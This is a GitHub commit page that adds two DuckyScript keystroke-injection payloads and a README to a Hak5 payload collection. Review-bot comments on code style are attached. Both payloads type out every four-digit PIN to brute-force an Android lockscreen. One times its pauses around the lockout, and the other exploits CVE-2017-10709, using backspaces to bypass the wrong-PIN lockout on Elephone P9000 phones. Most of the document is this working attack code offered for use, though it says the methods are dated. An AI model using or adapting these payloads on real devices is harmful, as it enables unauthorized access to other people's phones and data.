Merge pull request #201 from cribb-it/AndroidBrute

New Payload - Brute Force
pull/204/head
hak5glytch 2023-01-02 14:31:50 -08:00 committed by GitHub
commit 8f720110d3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 554 additions and 0 deletions


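--- /dev/null
+++ b/[file-1 path not shown on page]
@@ -0,0 +1,274 @@
+ATTACKMODE HID
+REM TITLE: Brute Force
+REM AUTHOR: Cribbit
+REM DESCRIPTION: Updated Version of Hak5 episode 1217.1
+REM VID URL: https://www.youtube.com/watch?v=yoYiEkk5TyI
+REM NOTE: This is 10 year old so will not work with modern android
+REM PROPS: Hak5Darren
+DELAY 3000
+EXTENSION TRANSLATE
+REM VERSION 1.0
+REM This extension acts as a library or collection of helper functions
+REM to work with converting variables in your payloads.
+REM WHY:
+REM Of the many ways to get information about the state of your payload
+REM is by injecting static strings effectively as debugging prints
+REM However, given the non-static nature of payloads using variables in
+REM DuckyScript 3.0 - the ability to decode variables during payload
+REM execution and print (inject) representations of their current state
+REM can often be a critically helpful development and debugging tool.
+REM Available Functions:
+REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
+REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
+REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
+REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
+REM USAGE:
+REM set $INPUT to desired var
+REM call the correct translate_ function for the expected data type e.g.
+REM VAR $myVar = 1234
+REM $INPUT = $myVar
+REM TRANSLATE_INT()
+REM REM the above code will inject 1234
+REM begin extension variables
+DEFINE PRINT_INT 0
+DEFINE PRINT_HEX 1
+VAR $DIGIT_PRINT_MODE = PRINT_INT
+VAR $D = 0
+VAR $IN = 0
+VAR $INPUT = 0
+VAR $MOD = 0
+VAR $P = FALSE
+VAR $NL = TRUE
+REM end extension variables
+REM REQUIRED for INT/HEX - convert int to char
+FUNCTION PRINTDIGIT()
+IF ($D == 0) THEN
+STRING 0
+ELSE IF ($D == 1) THEN
+STRING 1
+ELSE IF ($D == 2) THEN
+STRING 2
+ELSE IF ($D == 3) THEN
+STRING 3
+ELSE IF ($D == 4) THEN
+STRING 4
+ELSE IF ($D == 5) THEN
+STRING 5
+ELSE IF ($D == 6) THEN
+STRING 6
+ELSE IF ($D == 7) THEN
+STRING 7
+ELSE IF ($D == 8) THEN
+STRING 8
+ELSE IF ($D == 9) THEN
+STRING 9
+ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
+IF ($D == 10) THEN
+STRING A
+ELSE IF ($D == 11) THEN
+STRING B
+ELSE IF ($D == 12) THEN
+STRING C
+ELSE IF ($D == 13) THEN
+STRING D
+ELSE IF ($D == 14) THEN
+STRING E
+ELSE IF ($D == 15) THEN
+STRING F
+END_IF
+ELSE
+STRING ?
+END_IF
+END_FUNCTION
+REM REQUIRED for INT/HEX- consumes a character / place from the input
+FUNCTION CONSUME()
+$D = 0
+WHILE ($INPUT >= $MOD)
+$D = ($D + 1)
+$INPUT = ($INPUT - $MOD)
+END_WHILE
+IF (($D > 0) || ($P == TRUE)) THEN
+$P = TRUE
+PRINTDIGIT()
+END_IF
+END_FUNCTION
+REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
+FUNCTION SWAP_ENDIAN()
+$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
+END_FUNCTION
+REM Translates a variable of presumed integer type and attempts to convert
+REM and inject a DECIMAL string representation
+FUNCTION TRANSLATE_INT()
+$DIGIT_PRINT_MODE = PRINT_INT
+$P = FALSE
+IF ( $INPUT >= 10000) THEN
+$MOD = 10000
+CONSUME()
+END_IF
+IF (($INPUT >= 1000) || ($P == TRUE)) THEN
+$MOD = 1000
+CONSUME()
+END_IF
+IF (($INPUT >= 100) || ($P == TRUE)) THEN
+$MOD = 100
+CONSUME()
+END_IF
+IF (($INPUT >= 10) || ($P == TRUE)) THEN
+$MOD = 10
+CONSUME()
+END_IF()
+$D = $INPUT
+PRINTDIGIT()
+IF $NL THEN
+ENTER
+END_IF
+END_FUNCTION
+REM Translates a variable of presumed boolean type and attempts to convert
+REM and inject a BOOLEAN string representation
+FUNCTION TRANSLATE_BOOL()
+IF $INPUT THEN
+STRING TRUE
+ELSE
+STRING FALSE
+END_IF
+IF $NL THEN
+ENTER
+END_IF
+END_FUNCTION
+REM Translates a variable of presumed integer type and attempts to convert
+REM and inject a HEX string representation
+FUNCTION TRANSLATE_HEX()
+$DIGIT_PRINT_MODE = PRINT_HEX
+VAR $chars = 0
+VAR $d1 = 0
+VAR $d2 = 0
+VAR $d3 = 0
+VAR $d4 = 0
+WHILE ($INPUT > 0)
+IF ($chars == 0) THEN
+$d1 = ($INPUT % 16)
+ELSE IF ($chars == 1) THEN
+$d2 = ($INPUT % 16)
+ELSE IF ($chars == 2) THEN
+$d3 = ($INPUT % 16)
+ELSE IF ($chars == 3) THEN
+$d4 = ($INPUT % 16)
+END_IF
+$chars = ($chars + 1)
+$INPUT = ($INPUT / 16)
+END_WHILE
+VAR $i = 0
+STRING 0x
+IF ($chars == 0) THEN
+STRING 0x0000
+ELSE IF ($chars == 1) THEN
+STRING 000
+$D = $d1
+PRINTDIGIT()
+ELSE IF ($chars == 2) THEN
+STRING 00
+$D = $d2
+PRINTDIGIT()
+$D = $d1
+PRINTDIGIT()
+ELSE IF ($chars == 3) THEN
+STRING 0
+$D = $d3
+PRINTDIGIT()
+$D = $d2
+PRINTDIGIT()
+$D = $d1
+PRINTDIGIT()
+ELSE IF ($chars == 4) THEN
+STRING 0
+$D = $d4
+PRINTDIGIT()
+$D = $d3
+PRINTDIGIT()
+$D = $d2
+PRINTDIGIT()
+$D = $d1
+PRINTDIGIT()
+END_IF
+IF $NL THEN
+ENTER
+END_IF
+END_FUNCTION
+REM Translates a variable of presumed integer type and attempts to convert
+REM and inject a BINARY string representation
+FUNCTION TRANSLATE_BINARY()
+VAR $I = 16
+WHILE ( $I > 0 )
+$I = ($I - 1)
+IF (($INPUT & 0x8000) == 0 ) THEN
+STRING 0
+ELSE
+STRING 1
+END_IF
+$INPUT = ($INPUT << 1)
+END_WHILE
+IF $NL THEN
+ENTER
+END_IF
+END_FUNCTION
+END_EXTENSION
+REM Turn off TRANSLATE newline
+$NL = FALSE
+VAR $Frist = 0
+VAR $Second = 0
+VAR $Third = 0
+VAR $Forth = 0
+VAR $WaitTime = 30000
+VAR $WaitStep = 5000
+VAR $WaitDiff = 0
+VAR $Cnt = 0
+WHILE ($Frist < 10)
+$Second = 0
+WHILE ($Second < 10)
+$Third = 0
+WHILE ($Third < 10)
+$Forth = 0
+WHILE ($Forth < 10)
+$INPUT = $Frist
+TRANSLATE_INT()
+$INPUT = $Second
+TRANSLATE_INT()
+$INPUT = $Third
+TRANSLATE_INT()
+$INPUT = $Forth
+TRANSLATE_INT()
+$Forth = ($Forth + 1)
+DELAY 1000
+ENTER
+ENTER
+$Cnt = ($Cnt + 1)
+IF ($Cnt == 5) THEN
+$Cnt = 0
+WHILE ($WaitDiff < $WaitTime)
+DELAY $WaitStep
+ENTER
+$WaitDiff = ($WaitDiff + $WaitStep)
+END_WHILE
+$WaitDiff = 0
+END_IF
+END_WHILE
+$Third = ($Third + 1)
+END_WHILE
+$Second = ($Second + 1)
+END_WHILE
+$Frist = ($Frist + 1)
+END_WHILE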
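Review bot: The two loop counters that drive the payload body are misspelled — `VAR $Frist = 0` and `VAR $Forth = 0` next to the correctly spelled `$Second`/`$Third` — and the typo is carried through every use in the four nested WHILE loops; renaming them `$First` and `$Fourth` would make the nesting order readable at a glance, and the same misspellings recur in the second payload file of this commit. The `REM NOTE` header line also reads awkwardly; `REM NOTE: This method is over 10 years old and will not work on modern Android` says the same thing clearly. Inside the vendored TRANSLATE extension, the `$INPUT >= 10` block of TRANSLATE_INT is closed with `END_IF()` while every other block uses a bare `END_IF`; if the compiler does not tolerate the trailing `()` this is a syntax error, so it is worth confirming or normalising to `END_IF` (the second payload carries the same line).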


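--- /dev/null
+++ b/[file-2 path not shown on page]
@@ -0,0 +1,259 @@
+ATTACKMODE HID
+REM TITLE: Brute Force
+REM AUTHOR: Cribbit
+REM DESCRIPTION: POC of CVE-2017-10709 using a Ducky. The lockscreen on Elephone P9000 devices (running Android 6.0) allows physically proximate attackers to bypass a wrong-PIN lockout feature by pressing backspace after each PIN guess.
+REM PROPS: Kalani & Shinichi Kudo
+DELAY 3000
+EXTENSION TRANSLATE
+REM VERSION 1.0
+REM This extension acts as a library or collection of helper functions
+REM to work with converting variables in your payloads.
+REM WHY:
+REM Of the many ways to get information about the state of your payload
+REM is by injecting static strings effectively as debugging prints
+REM However, given the non-static nature of payloads using variables in
+REM DuckyScript 3.0 - the ability to decode variables during payload
+REM execution and print (inject) representations of their current state
+REM can often be a critically helpful development and debugging tool.
+REM Available Functions:
+REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
+REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
+REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
+REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
+REM USAGE:
+REM set $INPUT to desired var
+REM call the correct translate_ function for the expected data type e.g.
+REM VAR $myVar = 1234
+REM $INPUT = $myVar
+REM TRANSLATE_INT()
+REM REM the above code will inject 1234
+REM begin extension variables
+DEFINE PRINT_INT 0
+DEFINE PRINT_HEX 1
+VAR $DIGIT_PRINT_MODE = PRINT_INT
+VAR $D = 0
+VAR $IN = 0
+VAR $INPUT = 0
+VAR $MOD = 0
+VAR $P = FALSE
+VAR $NL = TRUE
+REM end extension variables
+REM REQUIRED for INT/HEX - convert int to char
+FUNCTION PRINTDIGIT()
+IF ($D == 0) THEN
+STRING 0
+ELSE IF ($D == 1) THEN
+STRING 1
+ELSE IF ($D == 2) THEN
+STRING 2
+ELSE IF ($D == 3) THEN
+STRING 3
+ELSE IF ($D == 4) THEN
+STRING 4
+ELSE IF ($D == 5) THEN
+STRING 5
+ELSE IF ($D == 6) THEN
+STRING 6
+ELSE IF ($D == 7) THEN
+STRING 7
+ELSE IF ($D == 8) THEN
+STRING 8
+ELSE IF ($D == 9) THEN
+STRING 9
+ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
+IF ($D == 10) THEN
+STRING A
+ELSE IF ($D == 11) THEN
+STRING B
+ELSE IF ($D == 12) THEN
+STRING C
+ELSE IF ($D == 13) THEN
+STRING D
+ELSE IF ($D == 14) THEN
+STRING E
+ELSE IF ($D == 15) THEN
+STRING F
+END_IF
+ELSE
+STRING ?
+END_IF
+END_FUNCTION
+REM REQUIRED for INT/HEX- consumes a character / place from the input
+FUNCTION CONSUME()
+$D = 0
+WHILE ($INPUT >= $MOD)
+$D = ($D + 1)
+$INPUT = ($INPUT - $MOD)
+END_WHILE
+IF (($D > 0) || ($P == TRUE)) THEN
+$P = TRUE
+PRINTDIGIT()
+END_IF
+END_FUNCTION
+REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
+FUNCTION SWAP_ENDIAN()
+$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
+END_FUNCTION
+REM Translates a variable of presumed integer type and attempts to convert
+REM and inject a DECIMAL string representation
+FUNCTION TRANSLATE_INT()
+$DIGIT_PRINT_MODE = PRINT_INT
+$P = FALSE
+IF ( $INPUT >= 10000) THEN
+$MOD = 10000
+CONSUME()
+END_IF
+IF (($INPUT >= 1000) || ($P == TRUE)) THEN
+$MOD = 1000
+CONSUME()
+END_IF
+IF (($INPUT >= 100) || ($P == TRUE)) THEN
+$MOD = 100
+CONSUME()
+END_IF
+IF (($INPUT >= 10) || ($P == TRUE)) THEN
+$MOD = 10
+CONSUME()
+END_IF()
+$D = $INPUT
+PRINTDIGIT()
+IF $NL THEN
+ENTER
+END_IF
+END_FUNCTION
+REM Translates a variable of presumed boolean type and attempts to convert
+REM and inject a BOOLEAN string representation
+FUNCTION TRANSLATE_BOOL()
+IF $INPUT THEN
+STRING TRUE
+ELSE
+STRING FALSE
+END_IF
+IF $NL THEN
+ENTER
+END_IF
+END_FUNCTION
+REM Translates a variable of presumed integer type and attempts to convert
+REM and inject a HEX string representation
+FUNCTION TRANSLATE_HEX()
+$DIGIT_PRINT_MODE = PRINT_HEX
+VAR $chars = 0
+VAR $d1 = 0
+VAR $d2 = 0
+VAR $d3 = 0
+VAR $d4 = 0
+WHILE ($INPUT > 0)
+IF ($chars == 0) THEN
+$d1 = ($INPUT % 16)
+ELSE IF ($chars == 1) THEN
+$d2 = ($INPUT % 16)
+ELSE IF ($chars == 2) THEN
+$d3 = ($INPUT % 16)
+ELSE IF ($chars == 3) THEN
+$d4 = ($INPUT % 16)
+END_IF
+$chars = ($chars + 1)
+$INPUT = ($INPUT / 16)
+END_WHILE
+VAR $i = 0
+STRING 0x
+IF ($chars == 0) THEN
+STRING 0x0000
+ELSE IF ($chars == 1) THEN
+STRING 000
+$D = $d1
+PRINTDIGIT()
+ELSE IF ($chars == 2) THEN
+STRING 00
+$D = $d2
+PRINTDIGIT()
+$D = $d1
+PRINTDIGIT()
+ELSE IF ($chars == 3) THEN
+STRING 0
+$D = $d3
+PRINTDIGIT()
+$D = $d2
+PRINTDIGIT()
+$D = $d1
+PRINTDIGIT()
+ELSE IF ($chars == 4) THEN
+STRING 0
+$D = $d4
+PRINTDIGIT()
+$D = $d3
+PRINTDIGIT()
+$D = $d2
+PRINTDIGIT()
+$D = $d1
+PRINTDIGIT()
+END_IF
+IF $NL THEN
+ENTER
+END_IF
+END_FUNCTION
+REM Translates a variable of presumed integer type and attempts to convert
+REM and inject a BINARY string representation
+FUNCTION TRANSLATE_BINARY()
+VAR $I = 16
+WHILE ( $I > 0 )
+$I = ($I - 1)
+IF (($INPUT & 0x8000) == 0 ) THEN
+STRING 0
+ELSE
+STRING 1
+END_IF
+$INPUT = ($INPUT << 1)
+END_WHILE
+IF $NL THEN
+ENTER
+END_IF
+END_FUNCTION
+END_EXTENSION
+REM Turn off TRANSLATE newline
+$NL = FALSE
+VAR $Frist = 0
+VAR $Second = 0
+VAR $Third = 0
+VAR $Forth = 0
+WHILE ($Frist < 10)
+$INPUT = $Frist
+TRANSLATE_INT()
+$Second = 0
+WHILE ($Second < 10)
+$INPUT = $Second
+TRANSLATE_INT()
+$Third = 0
+WHILE ($Third < 10)
+$INPUT = $Third
+TRANSLATE_INT()
+$Forth = 0
+WHILE ($Forth < 10)
+$INPUT = $Forth
+TRANSLATE_INT()
+$Forth = ($Forth + 1)
+DELAY 1000
+BACKSPACE
+END_WHILE
+$Third = ($Third + 1)
+BACKSPACE
+END_WHILE
+$Second = ($Second + 1)
+BACKSPACE
+END_WHILE
+$Frist = ($Frist + 1)
+BACKSPACE
+END_WHILE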
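Review bot: The `REM DESCRIPTION` header states this variant targets Elephone P9000 devices on Android 6.0 (CVE-2017-10709), which contradicts the README added in the same commit, whose single `Target: Android < 6 (I think)` line describes only the sibling payload; the README should list the two payloads' targets separately so a reader picks the right file for the behaviour they are studying. The file also vendors the complete TRANSLATE extension but calls only `TRANSLATE_INT()`, and since every value passed is a single digit 0–9 the CONSUME chain never runs — presumably the full extension is kept verbatim for consistency with the sibling payload, which is reasonable, but a one-line `REM` saying so would explain the roughly 200 lines of otherwise unused helpers (`TRANSLATE_HEX`, `TRANSLATE_BINARY`, `TRANSLATE_BOOL`, `SWAP_ENDIAN`, `$IN`, `$i`).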


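--- /dev/null
+++ b/[file-3 path not shown on page]
@@ -0,0 +1,21 @@
+# Brute Force
+- Author: Cribbit
+- Version: 1.0
+- Target: Android < 6 (I think)
+- Category: Mobile
+- Attackmode: HID
+- Props: *[Hak5Darren](https://github.com/hak5darren)* for original idea, *[Kalani](https://github.com/kalanihelekunihi)* & Shinichi Kudo for info on backspace CVE
+## Description
+An updated version of Hak5 episode 1217.1 android pin brute force method using just Ducky Script 3. Please not this brute force method is at least 10-year-old at time of writing. So, will not work on modern android phones. But give you a PoC of a way it could of be written.
+There is also a version to work with CVE-2017-10709 that uses backspaces.
+Click the image below to watch the original Hak5 Video:
+[![Hak5 1217.1, Hack any 4-digit Android PIN in 16 hours with a USB Rubber Ducky](https://img.youtube.com/vi/yoYiEkk5TyI/0.jpg)](https://www.youtube.com/watch?v=yoYiEkk5TyI)
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |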